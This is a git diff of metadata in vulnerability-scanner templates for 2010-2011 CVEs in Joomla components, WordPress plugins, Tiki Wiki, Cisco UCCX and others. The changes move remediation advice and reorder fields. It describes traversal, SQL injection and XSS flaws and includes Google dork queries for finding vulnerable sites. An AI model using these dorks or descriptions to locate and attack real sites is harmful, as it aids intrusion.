cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* epss-percentile: 0.76317 + cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xmlswf diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index f8ae87ea9a..3c38addf26 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14964 - https://nvd.nist.gov/vuln/detail/CVE-2010-3426 - http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt - http://www.exploit-db.com/exploits/14964 - https://exchange.xforce.ibmcloud.com/vulnerabilities/61723 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 vendor: 4you-studio diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 38586f00a8..9f54a500c0 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 - https://www.exploit-db.com/exploits/15505 - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt - http://www.exploit-db.com/exploits/15505/ - remediation: Upgrade to a supported product version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* epss-percentile: 0.85862 + cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 vendor: camtron diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 372af6ec0b..ee437547ef 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -5,6 +5,8 @@ info: author: 0x_akoko severity: critical description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability. + remediation: | + Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability. reference: - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt - https://www.openwall.com/lists/oss-security/2010/11/22/9 @@ -17,8 +19,8 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.02543 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* epss-percentile: 0.88814 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 061e6be952..a4e9d21c96 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 - http://seclists.org/fulldisclosure/2010/Nov/326 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* epss-percentile: 0.83541 + cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: artica diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index 8c54463c0a..75c9e2387b 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15791 - https://nvd.nist.gov/vuln/detail/CVE-2010-4617 - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/64223 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.00938 - cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* epss-percentile: 0.81097 + cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kanich diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index ceb14fd63a..28f82304dc 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15749 - https://nvd.nist.gov/vuln/detail/CVE-2010-4719 - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - http://www.exploit-db.com/exploits/15749 - http://www.fxwebdesign.nl/index.php?option=com_content&view=article&id=20&Itemid=56 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* epss-percentile: 0.91406 + cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fxwebdesign diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index 723d0c2698..14f22c3079 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15585 - https://nvd.nist.gov/vuln/detail/CVE-2010-4769 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4769 cwe-id: CWE-22 epss-score: 0.00949 - cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* epss-percentile: 0.81213 + cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: janguo diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index c789fa5beb..ad78593d78 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34250 - https://nvd.nist.gov/vuln/detail/CVE-2010-4977 - http://www.salvatorefresta.net/files/adv/Canteen%20Joomla%20Component%201.0%20Multiple%20Remote%20Vulnerabilities-04072010.txt - http://packetstormsecurity.org/1007-exploits/joomlacanteen-lfisql.txt - http://securityreason.com/securityalert/8495 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.00199 - cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* epss-percentile: 0.57091 + cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: miniwork diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 189aad9643..eea4df86bd 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12601 - https://nvd.nist.gov/vuln/detail/CVE-2010-5028 - http://www.vupen.com/english/advisories/2010/1269 - https://exchange.xforce.ibmcloud.com/vulnerabilities/58599 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.01052 - cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* epss-percentile: 0.82203 + cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: harmistechnology diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 9cd416d74e..2b51c75d92 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. + remediation: | + Apply the latest patches and updates provided by MODx to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/34788 - https://nvd.nist.gov/vuln/detail/CVE-2010-5278 @@ -17,8 +19,8 @@ info: cve-id: CVE-2010-5278 cwe-id: CWE-22 epss-score: 0.04725 - cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* epss-percentile: 0.91601 + cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modx diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index f2e1dd1847..7d26a64bca 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: critical description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34837 - https://nvd.nist.gov/vuln/detail/CVE-2010-5286 - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.04708 - cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* epss-percentile: 0.9159 + cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joobi diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 734dfe6c9d..1cf893689a 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -5,21 +5,21 @@ info: author: pikpikcu severity: medium description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/16103 - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - http://www.kb.cert.org/vuls/id/363726 - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 - http://securityreason.com/securityalert/8061 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* epss-percentile: 0.99457 + cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mj2 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 6eecee143f..5595d42765 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -5,25 +5,25 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 - https://www.exploit-db.com/exploits/17119 - http://www.exploit-db.com/exploits/17119 - https://exchange.xforce.ibmcloud.com/vulnerabilities/66559 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* epss-percentile: 0.89572 + cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/wp-custom-pages/" vendor: mikoviny product: wp_custom_pages + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" tags: edb,cve,cve2011,wordpress,wp-plugin,lfi http: diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index e5fdc764c0..3fb06048f0 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI. + remediation: | + Upgrade Chyrp to the latest version or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/35945 - http://www.openwall.com/lists/oss-security/2011/07/13/6 @@ -17,8 +19,8 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* epss-percentile: 0.85494 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chyrp diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index f3d1a3c33b..6cf391a790 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -5,6 +5,7 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - http://www.justanotherhacker.com/advisories/JAHx113.txt - http://www.openwall.com/lists/oss-security/2011/07/13/5 @@ -12,15 +13,14 @@ info: - http://www.openwall.com/lists/oss-security/2011/07/13/6 - http://securityreason.com/securityalert/8312 - https://exchange.xforce.ibmcloud.com/vulnerabilities/68565 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* epss-percentile: 0.90099 + cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: chyrp diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index 40f8378e09..a9be84307a 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36256 - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N cvss-score: 7.8 cve-id: CVE-2011-3315 cwe-id: CWE-22 epss-score: 0.90502 - cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* epss-percentile: 0.98414 + cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index ff4ccb75d0..2386f992e0 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -5,18 +5,18 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00182 - cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* epss-percentile: 0.54818 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 17dbb4c941..446f0cfe98 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -5,26 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4618 - http://wordpress.org/support/topic/wordpress-advanced-text-widget-plugin-cross-site-scripting-vulnerabilities - http://wordpress.org/extend/plugins/advanced-text-widget/changelog/ - http://www.openwall.com/lists/oss-security/2011/12/19/6 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71412 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.00746 - cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* epss-percentile: 0.78598 + cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: - google-query: inurl:"/wp-content/plugins/advanced-text-widget" max-request: 2 - product: advanced_text_widget_plugin vendor: simplerealtytheme + product: advanced_text_widget_plugin + google-query: inurl:"/wp-content/plugins/advanced-text-widget" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 0fd8498e37..29a2aa9f8c 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -5,26 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4624 - http://www.openwall.com/lists/oss-security/2011/12/23/2 - http://plugins.trac.wordpress.org/changeset/469785 - http://wordpress.org/extend/plugins/flash-album-gallery/changelog/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00301 - cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.65663 + cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/flash-album-gallery" - framework: wordpress vendor: codeasily product: grand_flagallery + framework: wordpress + google-query: inurl:"/wp-content/plugins/flash-album-gallery" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 412a1f94a5..22b9d25e63 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/36598 - https://nvd.nist.gov/vuln/detail/CVE-2011-4804 - http://foobla.com/news/latest/obsuggest-1.8-security-release.html - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 epss-score: 0.06953 - cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* epss-percentile: 0.93063 + cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: foobla diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 6e1ff30c8f..5e7c30dce0 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + remediation: | + Update to the latest version of Adminimize plugin (1.7.22) or apply the necessary patches to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 @@ -17,13 +19,13 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01001 - cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* epss-percentile: 0.8173 + cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/adminimize/" vendor: bueltge product: adminimize + google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 07d5a93bb9..742dd8123d 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + remediation: | + Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5106 - https://wordpress.org/plugins/flexible-custom-post-type/#developers @@ -17,13 +19,13 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00541 - cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* epss-percentile: 0.7437 + cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" vendor: fractalia product: flexible_custom_post_type + google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index d40037c7fa..8b93edda3b 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + remediation: | + Update to the latest version of the Alert Before Your Post plugin (0.1.1) or remove the plugin if it is not necessary for the website's functionality. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71413 @@ -14,13 +16,13 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.0022 - cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* epss-percentile: 0.59193 + cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: inurl:"/wp-content/plugins/alert-before-your-post" vendor: wordpress product: alert_before_you_post + google-query: inurl:"/wp-content/plugins/alert-before-your-post" tags: cve,cve2011,wordpress,xss,wp-plugin http: diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index 4e157103de..f57c5b7698 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. + remediation: | + Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks. reference: - https://nvd.nist.gov/vuln/detail/CVE-2011-5179 - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486 @@ -14,13 +16,13 @@ 